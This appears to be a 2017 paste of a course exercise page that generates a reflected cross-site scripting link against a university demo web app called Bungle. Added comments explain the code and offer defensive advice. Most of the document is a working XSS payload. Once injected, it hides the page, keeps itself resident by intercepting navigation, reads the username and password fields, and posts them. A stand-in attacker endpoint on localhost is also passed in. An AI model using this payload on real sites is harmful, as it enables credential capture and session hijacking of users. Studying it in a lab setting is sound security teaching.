
Untitled

a guest
Nov 16th, 2017
  1. <meta charset="utf-8">
  2. <script src="http://ajax.googleapis.com/ajax/libs/jquery/2.0.3/jquery.min.js"></script>
  3. <script>
  /**
   * Script body that makeLink() serializes with payload.toString() and places
   * inside a script element in the `q` parameter of the target's /search URL.
   *
   * All documentation is kept above the function on purpose: because the
   * function's source text is serialized, any comment added inside the body
   * would become part of the generated link.
   *
   * What the visible code does when it runs:
   *   - hides the `html` element, then calls proxy("./");
   *   - proxy(href) passes href to log() (which calls alert), loads href into
   *     the `html` element with jQuery .load(), shows it again and writes
   *     "pwned!" into #query;
   *   - after every load it rebinds click handlers on #bungle-lnk,
   *     #search-again-btn, #search-btn, .history-item, #log-in-btn,
   *     #new-account-btn and #log-out-btn. Each handler calls
   *     preventDefault() and re-enters proxy(), so the controls no longer
   *     trigger a normal navigation away from the injected script;
   *   - the log-in and new-account handlers read #username and #userpass
   *     themselves and POST them with $.ajax to /login and /create on
   *     trurl.cs.illinois.edu; the log-out handler POSTs to /logout.
   *
   * The `attacker` parameter is accepted but never read in this body, and
   * log() only calls alert(); both console.log lines are commented out.
   *
   * NOTE(review): this only runs on the target if /search writes `q` back into
   * the page without HTML-encoding it - presumably the xssdefense=0 case; the
   * server side is not shown here, confirm. Defensive takeaways: encode
   * reflected input for the HTML context, restrict inline script with a
   * Content-Security-Policy, and treat script markup in the `q` parameter of
   * request logs as an indicator. Once script runs in the page's origin it can
   * read what the user types into the credential fields, as the two handlers
   * above do.
   *
   * @param {string} attacker - endpoint URL passed in by makeLink(); unused here.
   */
  4. function payload(attacker) {
  5. function log(data) {
  6. alert(data);
  7. //console.log(data);
  8. //console.log($.param(data));
  9. }
  10. function proxy(href) {
  11. log(href);
  12. $("html").load(href, function(){
  13. $("html").show();
  14.  
  15. $("#query").val("pwned!");
  16.  
  17. $("#bungle-lnk, #search-again-btn").click(function(e) {
  18. e.preventDefault();
  19. proxy("./");
  20. });
  21.  
  22. $("#search-btn").click(function(e) {
  23. e.preventDefault();
  24. var search = $("#query").val();
  25. proxy("./search?q=" + search);
  26. });
  27.  
  28. $(".history-item").click(function(e) {
  29. var url = $(this).attr("href");
  30. e.preventDefault();
  31. proxy(url);
  32. });
  33.  
  34. $("#log-in-btn").click(function(e) {
  35. e.preventDefault();
  36. var username = $("#username").val();
  37. var userpass = $("#userpass").val();
  38. $.ajax({
  39. type: "POST",
  40. url: "http://trurl.cs.illinois.edu/login",
  41. dataType: "text",
  42. data: {
  43. username: username,
  44. password: userpass
  45. },
  46. success: function(){
  47. proxy("./");
  48. }
  49. });
  50. });
  51.  
  52. $("#new-account-btn").click(function(e) {
  53. e.preventDefault();
  54. var username = $("#username").val();
  55. var userpass = $("#userpass").val();
  56. $.ajax({
  57. type: "POST",
  58. url: "http://trurl.cs.illinois.edu/create",
  59. dataType: "text",
  60. data: {
  61. username: username,
  62. password: userpass
  63. },
  64. success: function(){
  65. $.ajax({
  66. type: "POST",
  67. url: "http://trurl.cs.illinois.edu/login",
  68. dataType: "text",
  69. data: {
  70. username: username,
  71. password: userpass
  72. },
  73. success: function(){
  74. proxy("./");
  75. }
  76. });
  77. }
  78. });
  79. });
  80.  
  81. $("#log-out-btn").click(function(e) {
  82. e.preventDefault();
  83. $.ajax({
  84. type: "POST",
  85. url: "http://trurl.cs.illinois.edu/logout",
  86. success: function(){
  87. proxy("./");
  88. }
  89. });
  90. });
  91. });
  92. }
  93. $("html").hide();
  94. proxy("./");
  95. }
  96.  
  /**
   * Builds the demonstration link for the xssdefense level 0 case.
   *
   * The link points at the target's /search page and carries, percent-encoded
   * in `q`, a script element holding the source text of payload() followed by
   * a call to it.
   *
   * NOTE(review): the server side is not shown; the link only has an effect if
   * /search echoes `q` into the page unencoded, which is what output encoding
   * or a Content-Security-Policy on the target would prevent.
   *
   * @param {number} xssdefense - defense level; only values loosely equal to 0 are handled.
   * @param {string} target - base URL of the site the link points at.
   * @param {string} attacker - endpoint URL written into the embedded payload() call.
   * @returns {string|undefined} the link, or undefined for any other defense level.
   */
  function makeLink(xssdefense, target, attacker) {
    // Loose comparison is kept deliberately so that the same inputs as before
    // (for example the string "0") still select this branch.
    if (xssdefense != 0) {
      return undefined;
    }

    // The payload is also invoked in the page that builds the link, not only
    // serialized - possibly left over from debugging; confirm before relying on it.
    payload(attacker);

    var prefix = target + "./search?xssdefense=" + xssdefense.toString() + "&q=";

    // The tag text is assembled from pieces so that the literal tag sequences
    // never appear inside the inline script block this file lives in; a literal
    // closing tag would end that block early.
    var openTag = "<script" + ">";
    var closeTag = "<" + "/script>";

    // `attacker` is placed between double quotes without any escaping.
    var injected = openTag + payload.toString() + ";payload(\"" + attacker + "\");" + closeTag;

    return prefix + encodeURIComponent(injected);
  }
  103.  
  // Settings for the exercise, read by the document-ready handler.
  // Base URL of the course web application the generated link points at
  // (plain http, as is every other URL in this file).
  var target = "http://trurl.cs.illinois.edu/";
  // Loopback endpoint (127.0.0.1, port 31337) handed to makeLink() as the
  // `attacker` argument.
  var attacker = "http://127.0.0.1:31337/stolen";
  // Defense level requested from the target; makeLink() only builds a link
  // when this is 0.
  var xssdefense = 0;
  107.  
  // On document ready, build the link and render it inside the page's h3 as
  // an anchor that opens in the window named "run".
  $(function () {
    var link = makeLink(xssdefense, target, attacker);
    // The value is written into the href attribute without attribute escaping.
    // If makeLink() returns undefined (any defense level other than 0), the
    // href becomes the text "undefined".
    var anchorMarkup = "<a target=\"run\" href=\"" + link + "\">Try Bungle!</a>";
    $("h3").html(anchorMarkup);
  });
  112. </script>
  113.  
  114. <h3></h3>